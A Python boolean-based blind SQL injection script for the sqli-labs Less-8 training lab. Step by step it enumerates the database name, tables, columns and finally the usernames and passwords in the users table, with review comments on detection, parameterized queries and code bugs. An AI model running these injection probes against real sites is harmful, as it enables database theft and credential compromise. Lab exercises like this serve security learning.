sqli-labs Less8 盲注
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
#数据库长度
import time
# Target: the deliberately vulnerable sqli-labs Less-8 exercise served from
# localhost. Less-8 is a boolean-based blind injection lab: the page never
# echoes query output, so the only signal each probe yields is whether the
# string 'You are in' appears in the response (injected condition true) or
# not. Every value below is therefore recovered with many separate GETs,
# each carrying an SQL fragment in the `id` parameter -- up to ~100 requests
# per character. From the defending side that request pattern (SQL syntax in
# a numeric parameter, near-identical probes differing by one value) is what
# log review or a WAF would key on, and the underlying defect is the lab
# presumably building its query from `id` by string concatenation; a
# parameterized query removes the oracle entirely.
url = "http://localhost/sqli-labs-master/Less-8"

# Step 1: length of the current database name. Example probe, as noted by
# the author:
# 0' or length(database())=8 --+
# NOTE(review): `len` shadows the builtin of the same name for the rest of
# the script; it is only ever used as a plain int (the range() bound in the
# next step), so nothing breaks, but it reads badly.
len = -1
for i in range(1,100):
    param = "0' or length(database())=" + str(i) + "#"
    res = requests.get(url,{'id':param})
    # if 'You are in' in res.text:
    # print 'database length is %d' % i
    # break
    # str.find() returns -1 when the needle is absent, and -1 is truthy in a
    # boolean context (only 0 is false), so the result must be compared with
    # -1 explicitly instead of being used directly as the condition.
    if res.content.decode('utf-8').find('You are in') != -1:
        # NOTE(review): print-statement syntax is Python 2, yet the file's
        # shebang names python3; under Python 3 this is a SyntaxError before
        # anything runs. Later steps test `res.text` instead of decoding
        # `res.content` by hand -- same check, inconsistent spelling.
        print '数据库长度为 %d' % i
        len = i
        break
# Step 2: the database name, recovered one character position at a time.
# arr holds the candidate characters: '' first, then printable ASCII 33..126.
# In the later steps a match on '' is used as the "past the end of the
# value" marker; in this loop j stays within the known length, so the ''
# probe can never be true and is effectively a wasted request.
arr = [] #all printable ASCII characters, preceded by '' as an end marker
arr.append('')
for i in range(33, 127):
    arr.append(chr(i))
database = ''
for j in range(1,len+1):   # `len` is the length found in step 1, not the builtin
    for i in arr:
        # mid(... from(j) for(1)) isolates the j-th character of the name;
        # the condition is true only for the one candidate equal to it.
        param = "0' or (mid((database()) from(" + str(j) + ") for(1)))='" + i + "'#"
        res = requests.get(url, {'id': param})
        # print res.url,i
        # print res.url
        if 'You are in' in res.text:
            # NOTE(review): i is already a str, so str(i) is a no-op; .lower()
            # folds case, which loses any uppercase characters in the real
            # value -- presumably acceptable because the lab's comparison is
            # case-insensitive, but confirm against the DB collation.
            database = database + str(i).lower()
            # print database
            break
print '数据库名为:%s' % database
# Step 3: number of tables in the current database, read from
# information_schema with the same boolean oracle: probe "count = i" for
# i in 1..99 until the page reports 'You are in'.
# NOTE(review): if no probe matches, tableCnt stays -1 and the table-name
# loop in the next step (range(0, tableCnt)) silently runs zero times; the
# printed count of -1 is the only hint.
tableCnt = -1
for i in range(1,100):
    param = "0' or (select count(table_name) as c from information_schema.tables where table_schema = database()) =" + str(i) + "#"
    res = requests.get(url, {'id': param})
    if 'You are in' in res.text:
        tableCnt = i
        break
print '表个数为:%d' % tableCnt
# Step 4: the name of each table, one character per position.
# For table i (selected with `limit i,1`) the loop walks positions j = 1..99
# and, at each position, tries every candidate in arr. A match on '' means
# mid() returned nothing, i.e. the name has ended, and sets isOk.
# NOTE(review): `break` only leaves the innermost `for q` loop; once isOk is
# set the `for j` loop still spins through the remaining positions, doing
# nothing because of the `if not isOk` guard. Harmless, but a `while` on
# isOk (or breaking out of both loops) would say what is meant.
tables = []
for i in range(0,tableCnt):
    table_name = ''
    isOk = False
    for j in range(1,100):
        for q in arr:
            if not isOk:
                param = "0' or (mid((select table_name as c from information_schema.tables " \
                    "where table_schema = database() limit %d,1) from(%d) for(1)))='%s' #" % (i, j, q)
                res = requests.get(url, {'id': param})
                # print i, j, q
                if 'You are in' in res.text:
                    if q == '':
                        # End of this table's name.
                        isOk = True
                        break
                    else :
                        # q is already a str; .lower() folds case (see step 2).
                        table_name = table_name + str(q).lower()
                        # print table_name
                        break
    tables.append(table_name)
print '表名称:%s' % tables
# Step 5: number of columns, using the `users` table as the worked example.
# The table name is hard-coded here and in the next two steps rather than
# taken from the `tables` list recovered in step 4.
# NOTE(review): as with tableCnt, a miss leaves columnCnt at -1 and the
# column-name loop below then runs zero times.
columnCnt = -1
for i in range(1,100):
    param = "0' or (select count(column_name) as c from information_schema.columns where table_schema = database() and table_name = 'users') =" + str(i) + "#"
    res = requests.get(url, {'id': param})
    if 'You are in' in res.text:
        columnCnt = i
        break
print '字段个数为:%d' % columnCnt
# Step 6: the name of each column of `users`, one character per position.
# Identical shape to the table-name step: column i via `limit i,1`,
# positions j = 1..99, a match on '' marks the end of the name and sets
# isOk. The same caveat applies: `break` exits only the `for q` loop, so the
# `for j` loop keeps iterating idly after isOk is set.
columns = []
for i in range(0,columnCnt):
    column_name = ''
    isOk = False
    for j in range(1,100):
        for q in arr:
            if not isOk:
                param = "0' or (mid((select column_name as c from information_schema.columns " \
                    "where table_schema = database() and table_name = 'users' limit %d,1) from(%d) for(1)))='%s' #" % (i, j, q)
                res = requests.get(url, {'id': param})
                # print i, j, q
                if 'You are in' in res.text:
                    if q == '':
                        # End of this column's name.
                        isOk = True
                        break
                    else :
                        # q is already a str; .lower() folds case (see step 2).
                        column_name = column_name + str(q).lower()
                        # print column_name
                        break
    columns.append(column_name)
print '字段名称:%s' % columns
# Pause before the final step; the reason is not recorded in the script.
time.sleep(5)
# Step 7: row contents of `users`. GROUP_CONCAT(id,username,password)
# joins the three columns of each row with no separator and separates rows
# with ','; the whole string is then read one character at a time, up to
# 999 positions, until mid() returns '' (isOk).
# NOTE(review): .lower() is applied to every recovered character, so any
# value that is case-sensitive (the password column in particular) is not
# reproduced exactly; and because the columns are concatenated without a
# separator, the printed rows cannot be split back into fields.
data = ''
isOk = False
for i in range(1,1000):
    for j in arr:
        if not isOk:
            param = "0' or (mid((select GROUP_CONCAT(id,username,password) from users) from(%d) for(1)))='%s' #" % (i, j)
            res = requests.get(url, {'id' : param})
            if 'You are in' in res.text:
                if j == '':
                    # Past the end of the concatenated string.
                    isOk = True
                    break
                else:
                    data = data + str(j).lower()
                    # print data
                    break
# One list element per row (GROUP_CONCAT's default row separator is ',').
data = data.split(',')
print '数据为:%s' % data
结果: